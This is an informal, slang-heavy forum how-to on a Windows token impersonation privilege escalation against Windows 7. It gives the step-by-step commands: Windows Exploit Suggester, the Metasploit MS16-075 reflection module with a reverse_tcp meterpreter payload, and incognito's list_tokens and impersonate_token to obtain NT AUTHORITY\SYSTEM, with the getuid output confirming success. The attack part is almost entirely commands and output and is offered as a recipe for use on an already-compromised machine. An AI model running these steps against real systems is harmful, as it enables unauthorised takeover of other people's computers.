Some buggers might try to copy and pretend to be another bloke's token to get more power and sneak past the security checks. A cheeky one can make a new access token that's the same as an existing one using DuplicateToken(Ex). Then they can use ImpersonateLoggedOnUser to make the calling thread act like a logged-on user's security thingy.
In this how-to, we'll be having a go at doing a token impersonation attack.
For this part, our target system will be runnin' Windows 7. Before we start, make sure you've already got your foot in the door on the system and have a meterpreter session goin'.
Let's get stuck into it by followin' these steps:
First up, we need to find any weak spots that can be exploited through the Potato attack. We can do this by usin' the Windows Exploit Suggester script:
Code: Select all
./windows-exploit-suggester.py --database <DATABASE.XLSX> --systeminfo <SYSTEMINFO.TXT>
After runnin' that script, we can spot a token impersonation weak spot. Lookin' into the MS16-075 vulnerability, we find a Metasploit module that can do the token impersonation attack automatically.
To load the module in Metasploit, run this:
Code: Select all
msf> use exploit/windows/local/ms16_075_reflection
Once it's loaded, you gotta set the module options. Do that by runnin' these commands:
Code: Select all
msf> set payload /windows/x64/meterpreter/reverse_tcp
Code: Select all
msf> set SESSION <SESSION-ID>
Now we're ready to run the module. Just type this:
Code: Select all
msf> run
Alright, next up we gotta do the impersonation bit. We can do that by loadin' the incognito module on the meterpreter. Just run this command:
Code: Select all
meterpreter> load incognito
Now we can use incognito to list all the tokens we can impersonate. Run this:
Code: Select all
meterpreter> list_tokens -u
Have a look at that, we can see the "NT AUTHORITY\SYSTEM" token there. Ripper!
Alright, let's impersonate that "NT AUTHORITY\SYSTEM" token. Run this command:
Code: Select all
meterpreter> impersonate_token “NT AUTHORITY\SYSTEM”
Now let's check that we've got those sweet, sweet elevated privileges. Run this in the meterpreter:
Code: Select all
meterpreter> getuid
Boom, just like that we've successfully jacked up our access!
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >